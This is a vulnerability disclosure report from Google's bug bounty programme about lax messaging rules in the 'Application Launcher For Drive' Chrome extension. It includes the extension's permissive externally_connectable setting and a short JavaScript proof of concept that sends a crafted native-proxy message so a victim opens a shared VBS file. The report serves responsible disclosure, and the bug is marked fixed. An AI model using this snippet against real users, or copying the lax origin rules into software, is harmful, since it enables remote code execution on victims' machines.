Skip to Content (Press Enter)
Google
Bug Hunters
Lax messaging rules on Application Launcher For Drive
Reported by:
NDevTK
Google VRP
triaged
00:03 | Jul 25, 2023
accepted
17:51 | Jul 28, 2023
triaged
15:28 | Aug 21, 2023
closed
22:26 | Aug 23, 2023
triaged
16:22 | Aug 24, 2023
accepted
19:55 | Aug 24, 2023
fixed
01:53 | Sep 2, 2023
reward decided
$3,133.70
Summary:
Lax messaging rules on Application Launcher For Drive
Product:
Google Drive
URL:
https://chrome.google.com/webstore/detail/application-launcher-for/lmjegmlicamnimmfhcmpkclmigmmcbeh
Vulnerability type:
Remote Code Execution (RCE)
Details
Any attacker on the same network can send messages to a proxy that opens whatever file they want shared in there google drive as long as there's a shortcut to it.
And subdomains are also allowed which maybe a problem if someone finds an XSS :)
The lax rules that allow insecure origins:
"externally_connectable": {
        "matches": [
            "
://
.google.com/*"
        ]
    },
The following code runs a VBS script on the victim.
Run the following on any google subdomain including insecure http:// ones.
let api = chrome.runtime.connect('lmjegmlicamnimmfhcmpkclmigmmcbeh', {name: 'com.google.drive.nativeproxy'});
let request = 'native_opener/v2/3/' + btoa('["<VICTIM EMAIL>", "<SHARED FILE ID>","VkJTRmlsZQ",""]');
api.postMessage(request);
Attack scenario
If the attacker has local network access or a browser extension with any google subdomain and they share a google drive with the victim they can force them to open a VBS file resulting in RCE.
登录
使用 Google 账号登录